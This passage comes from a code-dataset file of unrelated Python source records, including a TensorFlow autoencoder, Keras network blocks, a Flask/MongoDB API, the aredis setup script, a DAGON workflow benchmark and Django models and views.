TO_label_lookup[k] # find labels that are on this node in From, not to\n both = from_labels & TO_label_lookup[k] # Find labels that are on both nodes to use in Match\n if From_only:\n match_lab_string = ''\n from_only_lab_string = ':'+':'.join(From_only)\n if both:\n match_lab_string = ':'+':'.join(both)\n statements.add(\"MATCH (n%s) WHERE n.%s = '%s'\"\n \" SET n%s \" % (match_lab_string, node_key, k, from_only_lab_string))\n\n\n self.To.commit_list_in_chunks(statements=list(statements),\n verbose=verbose,\n chunk_length=chunk_length)\n\n\n \n \n \n \n \n\n \n \n \n\n\n \n \n \n \n \n \n","sub_path":"src/uk/ac/ebi/vfb/neo4j/neo4j_tools.py","file_name":"neo4j_tools.py","file_ext":"py","file_size_in_byte":14844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"640322857","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimage = np.load(\"test_GDSpgm.npy\")\nprint(\"Image Size:\",image.shape) # H=2000, W=5000\n\nplt.figure()\nplt.imshow(image, cmap='gray')\nplt.show()\n\ndef normailize_image(image):\n if np.max(image) == np.min(image):\n if np.max(image) > 0:\n return np.ones(image.shape)\n else:\n return np.zeros(image.shape)\n else:\n image = (image - np.min(image)) / (np.max(image) - np.min(image)) # normalize to [0,1]\n return image\n\nPIXEL_SIZE = 20 # nm\nCLIP_SIZE = 100 #pixel\n\nn_row = int(image.shape[0]/CLIP_SIZE)\nn_col = int(image.shape[1]/CLIP_SIZE)\n\nclip_lib = [] # clip 
holder\nfor i in range(n_row):\n for j in range(n_col):\n sub_clip = image[i*CLIP_SIZE : (i+1)*CLIP_SIZE, j*CLIP_SIZE : (j+1)*CLIP_SIZE]\n sub_clip_nor = normailize_image(sub_clip) # normalize to [0,1]\n clip_lib.append(sub_clip_nor)\n\nclip_lib = np.array(clip_lib)\nprint(clip_lib.shape)\n\nimport tensorflow as tf\n\ndef weight_variable(shape):\n '''Helper function to create a weight variable initialized with\n a normal distribution\n Parameters\n ----------\n shape : list\n Size of weight variable\n '''\n initial = tf.random_normal(shape, mean=0.0, stddev=0.01)\n return tf.Variable(initial)\n\ndef bias_variable(shape):\n '''Helper function to create a bias variable initialized with\n a constant value.\n Parameters\n ----------\n shape : list\n Size of weight variable\n '''\n initial = tf.random_normal(shape, mean=0.0, stddev=0.01)\n return tf.Variable(initial)\n \ndef conv2d_same(x, W):\n return tf.nn.conv2d(x, W, strides=[1, 2, 2, 1], padding = 'SAME')\n\ndef deconv2d_same(x, W, output_shape):\n return tf.nn.conv2d_transpose(x, W, output_shape, strides = [1, 2, 2, 1], padding = 'SAME')\n \ndef conv2d_valid(x, W):\n return tf.nn.conv2d(x, W, strides=[1, 2, 2, 1], padding = 'VALID')\n\ndef deconv2d_valid(x, W, output_shape):\n return tf.nn.conv2d_transpose(x, W, output_shape, strides = [1, 2, 2, 1], padding = 'VALID')\n\n\ndef autoencoder(x):\n # Num. 1 Convolutional Layer\n W_e_conv1 = weight_variable([5, 5, 1, 32])\n b_e_conv1 = bias_variable([32])\n h_e_conv1 = tf.nn.relu(tf.add(conv2d_same(x, W_e_conv1), b_e_conv1))\n # Num. 2 Convolutional Layer\n W_e_conv2 = weight_variable([5, 5, 32, 16])\n b_e_conv2 = bias_variable([16])\n h_e_conv2 = tf.nn.relu(tf.add(conv2d_same(h_e_conv1, W_e_conv2), b_e_conv2))\n # Num. 3 Convolutional Layer\n W_e_conv3 = weight_variable([5, 5, 16, 8])\n b_e_conv3 = bias_variable([8])\n h_e_conv3 = tf.nn.relu(tf.add(conv2d_valid(h_e_conv2, W_e_conv3), b_e_conv3))\n \n code_layer = h_e_conv3\n \n # Num. 1 Deconvolutional Layer\n W_d_conv1 = weight_variable([5, 5, 16, 8])\n output_shape_d_conv1 = tf.stack([tf.shape(x)[0], 25, 25, 16])\n h_d_conv1 = tf.nn.relu(deconv2d_valid(h_e_conv3, W_d_conv1, output_shape_d_conv1))\n # Num. 2 Deconvolutional Layer\n W_d_conv2 = weight_variable([5, 5, 32, 16])\n output_shape_d_conv2 = tf.stack([tf.shape(x)[0], 50, 50, 32])\n h_d_conv2 = tf.nn.relu(deconv2d_same(h_d_conv1, W_d_conv2, output_shape_d_conv2))\n # Num. 
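A quick, illustrative sanity check of the normailize_image helper defined in the autoencoder sample above: constant patches collapse to all-zeros or all-ones depending on sign, and anything else is rescaled into [0, 1].

import numpy as np

patch = np.array([[2.0, 4.0], [6.0, 8.0]])
print(normailize_image(patch))             # [[0. 0.333] [0.667 1.]] approximately
print(normailize_image(np.zeros((2, 2))))  # all zeros (constant, max not > 0)
print(normailize_image(np.ones((2, 2))))   # all ones (constant, positive max)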
3 Deconvolutional Layer\n W_d_conv3 = weight_variable([5, 5, 1, 32])\n output_shape_d_conv3 = tf.stack([tf.shape(x)[0], 100, 100, 1])\n h_d_conv3 = tf.nn.relu(deconv2d_same(h_d_conv2, W_d_conv3, output_shape_d_conv3))\n \n x_reconstruct = h_d_conv3\n \n cost = tf.reduce_mean(tf.pow(x_reconstruct - x, 2))\n \n return cost, x_reconstruct, code_layer\n\n \n#def main():\nnum_sample = clip_lib.shape[0]\nBATCH_SIZE = 50\n# placeholders for the images\ntf.reset_default_graph()\nx = tf.placeholder(tf.float32, shape=[None, 100, 100, 1])\n\n# build the model\nloss, output, latent = autoencoder(x)\n\n# and we use the Adam Optimizer for training\ntrain_step = tf.train.AdamOptimizer(1e-4).minimize(loss)\n\n\n\nsess = tf.InteractiveSession()\ninit_op = tf.global_variables_initializer()\nsess.run(init_op)\n\nfor i in range(1001):\n batch = clip_lib[np.random.choice(np.arange(num_sample), size=BATCH_SIZE, replace=False)]\n batch = batch.reshape(-1, 100, 100, 1)\n feed = {x : batch}\n if i % 20 == 0:\n train_loss = sess.run(loss, feed_dict=feed)\n print(\"step %d, training loss: %g\" % (i, train_loss))\n\n train_step.run(feed_dict={x: batch})\nprint(\"final loss %g\" % loss.eval(feed_dict={x: clip_lib.reshape(-1, 100, 100, 1)}))\n\n\n\ndef plot_n_reconstruct(origin_img, reconstruct_img, n = 10):\n plt.figure(figsize=(2 * 10, 4))\n for i in range(n):\n # display original\n ax = plt.subplot(2, n, i + 1)\n plt.imshow(origin_img[i])\n plt.gray()\n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\n\n # display reconstruction\n ax = plt.subplot(2, n, i + 1 + n)\n plt.imshow(reconstruct_img[i])\n plt.gray()\n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\n plt.show()\n\ntest_size = 10\ntest_origin_img = clip_lib[np.random.choice(np.arange(num_sample), size=test_size, replace=False)]\ntest_reconstruct_img = output.eval(feed_dict = {x: test_origin_img.reshape(-1, 100, 100, 1)})\ntest_reconstruct_img = test_reconstruct_img.reshape(-1, 100, 100)\nplot_n_reconstruct(test_origin_img, test_reconstruct_img)\n\n\ndef plot_conv_layer(layer, image, num_filters):\n output = sess.run(layer, feed_dict = {x: image.reshape(-1, 100, 100, 1)}) \n fig, axes = plt.subplots(3, 3) \n for i, ax in enumerate(axes.flat):\n if i < num_filters:\n img = output[0, :, :, i]\n ax.imshow(img, interpolation='nearest', cmap='gray')\n else:\n ax.imshow(image, interpolation='nearest', cmap='gray')\n ax.set_xticks([])\n ax.set_yticks([]) \n plt.show()\n\nimage1 = clip_lib[20]\nplot_conv_layer(latent, image1, 8)\n\n\n\n\n\n","sub_path":"autoencoder_FeatureExtraction_V2.py","file_name":"autoencoder_FeatureExtraction_V2.py","file_ext":"py","file_size_in_byte":5943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"151424175","text":"\"\"\"Network utility functions.\"\"\"\n\nfrom typing import Tuple\n\nimport tensorflow as tf\n\n# Default options used in all non-logit convolutional layers.\nOPTIONS_CONV = {\"kernel_size\": 3, \"padding\": \"same\", \"kernel_initializer\": \"he_normal\"}\n\n\ndef inception_naive_block(\n inputs: tf.keras.layers.Layer, filters: int\n) -> tf.keras.layers.Layer:\n \"\"\"Inception naive block.\n\n [Conv2d(1,1), Conv2D(3,3), Conv2D(5,5), MaxPooling2D(3,3)] -> output\n\n Args:\n inputs: Input layer.\n filters: Number of convolutional filters applied.\n \"\"\"\n # 1x1 conv\n conv1 = tf.keras.layers.Conv2D(\n filters,\n (1, 1),\n activation=\"relu\",\n padding=\"same\",\n kernel_initializer=\"he_normal\",\n )(inputs)\n # 3x3 conv\n 
conv3 = tf.keras.layers.Conv2D(\n filters * 2,\n (3, 3),\n activation=\"relu\",\n padding=\"same\",\n kernel_initializer=\"he_normal\",\n )(inputs)\n # 5x5 conv\n conv5 = tf.keras.layers.Conv2D(\n filters * 4,\n (5, 5),\n activation=\"relu\",\n padding=\"same\",\n kernel_initializer=\"he_normal\",\n )(inputs)\n # 3x3 max pooling\n pool = tf.keras.layers.MaxPooling2D((3, 3), strides=(1, 1), padding=\"same\")(inputs)\n\n # concatenate filters, assumes filters/channels last\n layer_out = tf.keras.layers.concatenate([conv1, conv3, conv5, pool], axis=-1)\n return layer_out\n\n\ndef conv_block(\n inputs: tf.keras.layers.Layer, filters: int, n_convs: int = 2, dropout: float = 0\n) -> tf.keras.layers.Layer:\n \"\"\"Convolutional block with optional dropout layer.\n\n n_convs * (Conv2D -> ReLU -> Optional Dropout).\n\n Args:\n inputs: Input layer.\n filters: Number of convolutional filters applied.\n n_convs: Number of convolution+relu blocks.\n dropout: If > 0, a dropout layer will be added.\n \"\"\"\n x = inputs\n for _ in range(n_convs):\n x = tf.keras.layers.Conv2D(filters, **OPTIONS_CONV)(x)\n x = tf.keras.layers.Activation(\"relu\")(x)\n x = tf.keras.layers.Dropout(dropout)(x)\n return x\n\n\ndef convpool_block(\n inputs: tf.keras.layers.Layer, filters: int, n_convs: int = 2\n) -> tf.keras.layers.Layer:\n \"\"\"Conv_block with added 2D MaxPooling.\"\"\"\n x = conv_block(inputs=inputs, filters=filters, n_convs=n_convs)\n x = tf.keras.layers.MaxPooling2D()(x)\n\n return x\n\n\ndef convpool_skip_block(\n inputs: tf.keras.layers.Layer, filters: int, n_convs: int = 2\n) -> Tuple[tf.keras.layers.Layer, tf.keras.layers.Layer]:\n \"\"\"Conv_block with skip connection.\n\n Returns:\n skip: Layer to be used as skip connection. Output from conv_block.\n x: Layer to be used in next process. 
Output from 2D MaxPooling.\n \"\"\"\n skip = conv_block(inputs=inputs, filters=filters, n_convs=n_convs)\n x = tf.keras.layers.MaxPooling2D()(skip)\n\n return skip, x\n\n\ndef upconv_block(\n inputs: tf.keras.layers.Layer,\n skip: tf.keras.layers.Layer,\n filters: int,\n n_convs: int = 2,\n dropout: float = 0,\n) -> tf.keras.layers.Layer:\n \"\"\"Upconvolutional block with skip connection concatenation.\n\n Upsampling -> Conv2D -> ReLU -> Concatenation with skip -> Conv_block.\n\n Args:\n inputs: Input layer.\n skip: Skip connection input layer.\n filters: Number of convolutional filters applied.\n n_convs: Number of convolution+relu blocks after concatenation.\n dropout: If > 0, a dropout layer will be added.\n \"\"\"\n x = inputs\n x = tf.keras.layers.UpSampling2D()(x)\n x = tf.keras.layers.Conv2D(filters=filters, **OPTIONS_CONV)(x)\n x = tf.keras.layers.Activation(\"relu\")(x)\n x = tf.keras.layers.Dropout(dropout)(x)\n x = tf.keras.layers.Concatenate()([skip, x])\n x = conv_block(inputs=x, filters=filters, n_convs=n_convs, dropout=dropout)\n\n return x\n\n\ndef residual_block(\n inputs: tf.keras.layers.Layer, filters: int\n) -> tf.keras.layers.Layer:\n \"\"\"Simple residual block with skip connection addition.\n\n Conv2D -> ReLU (skip) -> Conv2D -> ReLU -> Conv2D -> Addition with skip -> ReLU.\n \"\"\"\n x = tf.keras.layers.Conv2D(filters=filters, **OPTIONS_CONV)(inputs)\n x = tf.keras.layers.Activation(\"relu\")(x)\n skip = x\n\n x = tf.keras.layers.Conv2D(filters=filters, **OPTIONS_CONV)(x)\n x = tf.keras.layers.Activation(\"relu\")(x)\n x = tf.keras.layers.Conv2D(filters=filters, **OPTIONS_CONV)(x)\n\n x = tf.keras.layers.Add()([x, skip])\n x = tf.keras.layers.Activation(\"relu\")(x)\n\n return x\n\n\ndef logit_block(\n inputs: tf.keras.layers.Layer, n_channels: int\n) -> tf.keras.layers.Layer:\n \"\"\"Final decision output with sigmoid/softmax activation depending on n_channels.\"\"\"\n x = tf.keras.layers.Conv2D(filters=n_channels, kernel_size=1)(inputs)\n if n_channels == 1:\n x = tf.keras.layers.Activation(\"sigmoid\")(x)\n else:\n x = tf.keras.layers.Activation(\"softmax\")(x)\n\n return x\n","sub_path":"deepblink/networks/_networks.py","file_name":"_networks.py","file_ext":"py","file_size_in_byte":4888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"562585635","text":"# vim: ts=2:sw=2:tw=80:nowrap\n\ndef recursive_update(D, new):\n \"\"\"\n Recursively update the config template hierarchy. The intent of this function\n is to allow configuration items to be added to a device config without\n requiring an file-version upgrade. 
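A hypothetical composition of the network building blocks above into a tiny one-level encoder/decoder; the input size, filter counts and single-channel sigmoid output are illustrative assumptions, not a configuration taken from the source.

inputs = tf.keras.Input(shape=(64, 64, 3))
skip, x = convpool_skip_block(inputs, filters=16)  # 64x64 -> 32x32, keep skip
x = conv_block(x, filters=32, dropout=0.1)
x = upconv_block(x, skip, filters=16)              # 32x32 -> 64x64, concat skip
outputs = logit_block(x, n_channels=1)             # sigmoid for a binary mask
model = tf.keras.Model(inputs, outputs)
model.summary()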
This is only possible, if the new items\n come with reasonable defaults.\n if\n - a configuration item must be changed\n - a configuration item must be removed\n - a new configuration item does not come with reasonable defaults\n then a new file-version upgrade _must_ be implemented.\n \"\"\"\n for k, dsub in new.items():\n if 'value' in dsub:\n D[k] = dsub.copy()\n else:\n recursive_update(D.setdefault(k, dict()), dsub)\n\n\n","sub_path":"python/arbwave/tools/config_template_update.py","file_name":"config_template_update.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"504732570","text":"import os\r\nimport logging\r\nfrom pymongo import MongoClient\r\nfrom flask import Flask, request\r\nfrom jsonschema import validate, ValidationError\r\nfrom dotenv import load_dotenv\r\nimport validation_schemas\r\n\r\nload_dotenv()\r\n\r\napp = Flask(__name__)\r\napp.logger.setLevel(\"INFO\")\r\napp.logger.info(\"Hello!\")\r\n\r\nif not os.getenv(\"DATABASE_URL\"):\r\n raise RuntimeError(\"DATABASE_URL is not set\")\r\nclient = MongoClient(os.getenv(\"DATABASE_URL\"))\r\ndb = client.starbase0\r\n\r\n@app.route(\"/\", methods = [\"POST\"])\r\ndef hello():\r\n try:\r\n app.logger.info(\"hello was called\")\r\n\r\n data = request.json\r\n app.logger.info(\"request: %s\", data)\r\n validate(data, validation_schemas.request)\r\n\r\n name = data[\"name\"]\r\n\r\n person = db.people.find_one({\"name\": name})\r\n app.logger.info(\"database item found: %s\", person)\r\n\r\n response = {\"message\": \"Hello \" + person[\"name\"] + \"!\"}\r\n validate(response, validation_schemas.response)\r\n\r\n return response\r\n\r\n except Exception as inst:\r\n app.logger.error(inst)\r\n \r\n return {\"message\": \"Did not find person.\"}","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"536761857","text":"import calendar\nfrom datetime import date\n\n#===============================================================================\n# Return a passed number with th/st/nd added\n#===============================================================================\ndef num_format(n):\n return str(n)+(\"th\" if 4<=n%100<=20 else {1:\"st\",2:\"nd\",3:\"rd\"}.get(n%10, \"th\"))\n\n#===============================================================================\n# Needed this function to get dates for future events\n#===============================================================================\ndef dow_date_finder(N_STR='First',WEEKDAY_STR='Monday',MONTH_STR='January',year=date.today().year):\n day=['Monday','Tuesday','Wednesday','Thursday','Friday','Saturday','Sunday'].index(WEEKDAY_STR)\n month=['January','February','March','April','May','June','July','August','September','October','November','December'].index(MONTH_STR)+1\n \n if N_STR in ['First','Second','Third','Fourth']:\n which_weekday_in_month=['First','Second','Third','Fourth'].index(N_STR)\n elif N_STR in ['Last','Second to Last','Third to Last']:\n which_weekday_in_month=-(1+['Last','Second to Last','Third to Last'].index(N_STR))\n \n bom, days = calendar.monthrange(year, month)\n firstmatch = (day - bom) % 7 + 1\n day = range(firstmatch, days+1, 7)[which_weekday_in_month]\n return date(year, month, day)\n\n\ndef postmark_email(subject, to_address, body, tag):\n import os\n from postmark import PMMail\n message = PMMail(\n api_key = 
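An illustrative call to recursive_update above: template entries carrying a 'value' key are copied in wholesale, while everything else is merged level by level, so existing settings survive the update.

config = {"clock": {"rate": {"value": 10}}}
template = {"clock": {"source": {"value": "internal"}}, "debug": {"value": False}}
recursive_update(config, template)
print(config)
# {'clock': {'rate': {'value': 10}, 'source': {'value': 'internal'}},
#  'debug': {'value': False}}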
os.environ.get('POSTMARK_API_KEY'),\n subject = subject,\n sender = \"shorewoodmensclub@googlegroups.com\",\n to = to_address,\n text_body = body,\n tag = tag\n )\n message.send()","sub_path":"smc/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"22735738","text":"\ndef countWord(fname,word):\n k = 0\n with open(fname, 'r') as f:\n for line in f:\n # print(line)\n words = line.split()\n for i in words:\n if(i==word):\n k=k+1\n return k\n\nprint(countWord('./files/testfile.txt', 'dummy'))\n","sub_path":"count_word.py","file_name":"count_word.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"396467211","text":"#!/usr/bin/env python\nimport os\nimport sys\nimport warnings\n\nfrom aredis import __version__\n\ntry:\n from setuptools import setup\n from setuptools.command.test import test as TestCommand\n from setuptools.command.build_ext import build_ext\n from setuptools.extension import Extension\n\n\n class PyTest(TestCommand):\n def finalize_options(self):\n TestCommand.finalize_options(self)\n self.test_args = []\n self.test_suite = True\n\n def run_tests(self):\n # import here, because outside the eggs aren't loaded\n import pytest\n errno = pytest.main(self.test_args)\n sys.exit(errno)\n\nexcept ImportError:\n\n from distutils.core import setup, Extension\n from distutils.command.build_ext import build_ext\n\n\n def PyTest(x):\n x\n\n\nclass custom_build_ext(build_ext):\n \"\"\"\n These code comes from tornado.\n Allow C extension building to fail.\n\n The C extension speeds up crc16, but is not essential.\n \"\"\"\n\n warning_message = \"\"\"\n********************************************************************\nWARNING: %s could not\nbe compiled. 
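Illustrative calls for the two date helpers above; the 2024 dates were checked against a calendar, and num_format follows the usual English ordinal-suffix rules including the 11th-13th teen exception.

print(num_format(23))                                           # 23rd
print(num_format(11))                                           # 11th (teens take 'th')
print(dow_date_finder("Fourth", "Thursday", "November", 2024))  # 2024-11-28
print(dow_date_finder("Last", "Monday", "May", 2024))           # 2024-05-27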
No C extensions are essential for aredis to run,\nalthough they do result in significant speed improvements for\nwebsockets.\n%s\n\nHere are some hints for popular operating systems:\n\nIf you are seeing this message on Linux you probably need to\ninstall GCC and/or the Python development package for your\nversion of Python.\n\nDebian and Ubuntu users should issue the following command:\n\n $ sudo apt-get install build-essential python-dev\n\nRedHat and CentOS users should issue the following command:\n\n $ sudo yum install gcc python-devel\n\nFedora users should issue the following command:\n\n $ sudo dnf install gcc python-devel\n\nIf you are seeing this message on OSX please read the documentation\nhere:\n\nhttp://api.mongodb.org/python/current/installation.html#osx\n********************************************************************\n\"\"\"\n\n def run(self):\n try:\n build_ext.run(self)\n except Exception:\n e = sys.exc_info()[1]\n sys.stdout.write('%s\\n' % str(e))\n warnings.warn(self.warning_message % (\"Extension modules\",\n \"There was an issue with \"\n \"your platform configuration\"\n \" - see above.\"))\n\n def build_extension(self, ext):\n name = ext.name\n try:\n build_ext.build_extension(self, ext)\n except Exception:\n e = sys.exc_info()[1]\n sys.stdout.write('%s\\n' % str(e))\n warnings.warn(self.warning_message % (\"The %s extension \"\n \"module\" % (name,),\n \"The output above \"\n \"this warning shows how \"\n \"the compilation \"\n \"failed.\"))\n\n\nf = open(os.path.join(os.path.dirname(__file__), 'README.rst'))\nlong_description = f.read()\nf.close()\n\nsetup(\n name='aredis',\n version=__version__,\n description='Python async client for Redis key-value store',\n long_description=long_description,\n url='https://github.com/NoneGG/aredis',\n author='Jason Chen',\n author_email='847671011@qq.com',\n maintainer='Jason Chen',\n maintainer_email='847671011@qq.com',\n keywords=['Redis', 'key-value store', 'asyncio'],\n license='MIT',\n packages=['aredis', 'aredis.commands'],\n tests_require=['pytest',\n 'pytest_asyncio>=0.5.0'],\n cmdclass={\n 'test': PyTest,\n 'build_ext': custom_build_ext\n },\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Environment :: Console',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6'\n ],\n ext_modules=[\n Extension(name='aredis.speedups',\n sources=['aredis/speedups.c']),\n ]\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":4317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"404415038","text":"import json\nimport os.path\nimport time\nfrom dagon import Workflow\nfrom dagon.task import DagonTask, TaskType\nfrom dagon.docker_task import DockerTask\nfrom dagon import Status\nfrom dagon.dag_tps import DAG_TPS\nimport sys\nimport logging\nimport time\n\ndef cleanContainers():\n os.system('docker rm -f $(docker ps -aq --filter ancestor=module_todb:v1)')\n os.system('docker rm -f $(docker ps -aq --filter ancestor=module_interpolation:v1)')\n\n\n# 2 workflows in a DAGTP adding TPS\nif __name__ == '__main__':\n\n command_dir = sys.argv[1]\n no_TPS = int(sys.argv[2]) \n iterations = 31\n\n logfile= open(\"../logs/\"+str(no_TPS)+\"_TPS_test.txt\", \"a+\")\n logfile.write(\"building,validation,runtime,extraction,processing,\\n\")\n\n # Create 
the orchestration workflow\n for i in range(0,iterations):\n\n meta_workflow = DAG_TPS(\"DAGtp_2WF_\"+str(no_TPS)+\"TPS\")\n start_building = time.time()\n\n wf_a = Workflow(\"TestTPS_WFa\")\n taskA = DagonTask(TaskType.BATCH, \"AdquisitionA\", \"cp -r \"+command_dir+\"/launcher/lib $PWD;java -jar \"+command_dir+\"launcher/launcher.jar 1 1 01-01-2019 31-01-2019 $PWD/ adq_tps_a\")\n taskB = DockerTask(\"InterpolationA\", \"python /home/Interpolacion.py -i workflow:///AdquisitionA/metadata/FilesNc -w 1 \", image=\"module_interpolation:v1\")\n taskC = DockerTask(\"UploaderA\", \"python /home/upload.py -i workflow:///InterpolationA/output -w 1 \", image=\"module_todb:v1\")\n \n wf_b = Workflow(\"TestTPS_WFb\")\n taskD = DagonTask(TaskType.BATCH, \"AdquisitionB\", \"cp -r \"+command_dir+\"/launcher/lib $PWD;java -jar \"+command_dir+\"launcher/launcher.jar 1 1 01-03-2019 31-03-2019 $PWD/ adq_tps_b\")\n taskE = DockerTask(\"InterpolationB\", \"python /home/Interpolacion.py -i workflow:///AdquisitionB/metadata/FilesNc -w 1 \", image=\"module_interpolation:v1\")\n taskF = DockerTask(\"UploaderB\", \"python /home/upload.py -i workflow:///InterpolationB/output -w 1 \", image=\"module_todb:v1\")\n\n wf_a.add_task(taskA)\n wf_a.add_task(taskB)\n wf_a.add_task(taskC)\n\n wf_b.add_task(taskD)\n wf_b.add_task(taskE)\n wf_b.add_task(taskF)\n\n meta_workflow.add_workflow(wf_a)\n meta_workflow.add_workflow(wf_b)\n\n meta_workflow.make_dependencies()\n\n end_building = time.time() #end building\n start_validation = time.time() #start validate\n meta_workflow.Validate_WF()\n end_validation = time.time() #end validation\n\n\n # run the workflow\n start_exe = time.time() #start execution\n meta_workflow.run()\n end_exe = time.time() #end execution\n\n start_extraction = time.time() #start data extraction \n\n TPS = dict()\n for TPP in range(1,no_TPS+1):\n TPS[str(TPP)] = meta_workflow.Create_TPP_Double(\"InterpolationA\", \"InterpolationB\" , \"Station_code-Station_code\", Bpath=\"output/\", Apath=\"output/\")\n meta_workflow.prepare_tps() #extract data\n end_extraction = time.time() #end data extraction \n\n start_proc= time.time() #start TPS \n\n for TPP in range(1,no_TPS+1):\n a = meta_workflow.TPSapi.Describe(TPS[str(TPP)])\n end_proc= time.time() #end TPS \n \n logfile.write(\"%s,%s,%s,%s,%s\\n\" %(end_building-start_building, end_validation-start_validation, end_exe-start_exe,end_extraction-start_extraction,end_proc-start_proc))\n\n cleanContainers()\n\n logfile.close()","sub_path":"examples/Transversal_test_scripts/TPS/test_TPS_nointerference.py","file_name":"test_TPS_nointerference.py","file_ext":"py","file_size_in_byte":3419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"222193224","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndata = pd.read_csv(\"debug.csv\", sep=\",\")\n#dataframe = pd.DataFrame({'Col': np.random.uniform(size=1000)})\n\ny=data.values[1:,10]\nx=data.values[1:,0]\ncolor = np.where( data.values[1:,6]=='f','r', 'b')\nplt.figure()\nplt.scatter(x,y,c=color)\nplt.ylabel(\"Stress\")\nplt.title(\"Genderwise Stress distribution\")\n#plt.xlabel(\"Possibilities\")\nplt.legend('m','f')","sub_path":"Assignment-1/1A/scatterplot.py","file_name":"scatterplot.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"530400732","text":"from Class_OOP import Student\r\n\r\n\r\nclass Triangle:\r\n base = ''\r\n height = 
''\r\n\r\n def __init__(self, base, height):\r\n self.base = base\r\n self.height = height\r\n\r\n def calculate_area(self):\r\n area = 0.5 * self.base * self.height\r\n print('Area=', area)\r\n\r\n\r\nclass nothing (Student):\r\n print('Nothing Class')\r\n\r\n\r\nt1 = Triangle(10, 20)\r\nt1.calculate_area()\r\n\r\n\r\nt2 = Triangle(20, 30)\r\nt2.calculate_area()\r\n\r\ntt1 = nothing(1009,'Shakib Sha', 3.99)\r\n\r\nx = 1 + 2 * 3 - 8 / 4\r\nprint(x)","sub_path":"pythonProject1/Exercise.py","file_name":"Exercise.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"19671629","text":"from django.db import models\nfrom atracoes.models import Atracao\nfrom comentarios.models import Comentario\n#from comentarios.models import Avaliacao\nfrom enderecos.models import Endereco\n\n\nclass pontoTuristico(models.Model):\n nome = models.CharField('nome', max_length=130)\n descricao= models.TextField(name='descricao')\n status= models.BooleanField(name='status',default=False)\n atracoes = models.ManyToManyField(Atracao)\n comentarios = models.ManyToManyField(Comentario)\n #avaliacao = models.ManyToManyField(Avaliacao)\n endereco = models.ForeignKey(Endereco, on_delete=models.CASCADE,null=True,blank=True)\n foto = models.ImageField(upload_to= 'pontos_turisticos',null=True,blank=True)\n\n def __str__(self):\n return self.nome\n \n\n class Meta:\n db_table= 'ponto turistico'\n verbose_name= \"Ponto turistico\"\n verbose_name_plural= \"Pontos turisticos\"\n\n\n","sub_path":"core/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"355043417","text":"from django.shortcuts import render\nfrom django.http import JsonResponse\n\nfrom django.utils.decorators import method_decorator\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.views.decorators.http import require_GET, require_POST\nfrom django.views.decorators.cache import cache_page\nfrom django.contrib.auth.decorators import login_required\n\nfrom django.apps import apps\n\nfrom rest_framework import viewsets\nfrom rest_framework.response import Response\nfrom users.serializers import UserSerializer\nfrom rest_framework.decorators import action\n\nfrom users.documents import UserDocument\n# Create your views here.\n\n\n'''@csrf_exempt\n@require_GET\n@login_required\ndef index(request):\n return render(request, 'users_index.html')'''\n\n\n@csrf_exempt\n@require_GET\n@login_required\ndef profile_details(request):\n User = apps.get_model('users', 'User')\n #user = User.objects.filter(id=request.GET['user_id']).values('id', 'username', 'first_name', 'avatar').first()\n user = User.objects.filter(id=request.user.id).values('id', 'username', 'first_name', 'avatar').first()\n return JsonResponse({'profile': user})\n\n@cache_page(60*15)\n@csrf_exempt\n@require_GET\n@login_required\ndef contacts_list(request):\n User = apps.get_model('users', 'User')\n \n users = User.objects.all().values('id', 'username', 'first_name', 'avatar')\n return JsonResponse({'contacts': list(users)})\n \n \n@csrf_exempt\n@require_GET\n@login_required\ndef search_users(request):\n User = apps.get_model('users', 'User')\n \n users = User.objects.filter(username__contains=request.GET['name']).values('id', 'username', 'first_name', 'avatar')[:int(request.GET['limit'])]\n return JsonResponse({'users': 
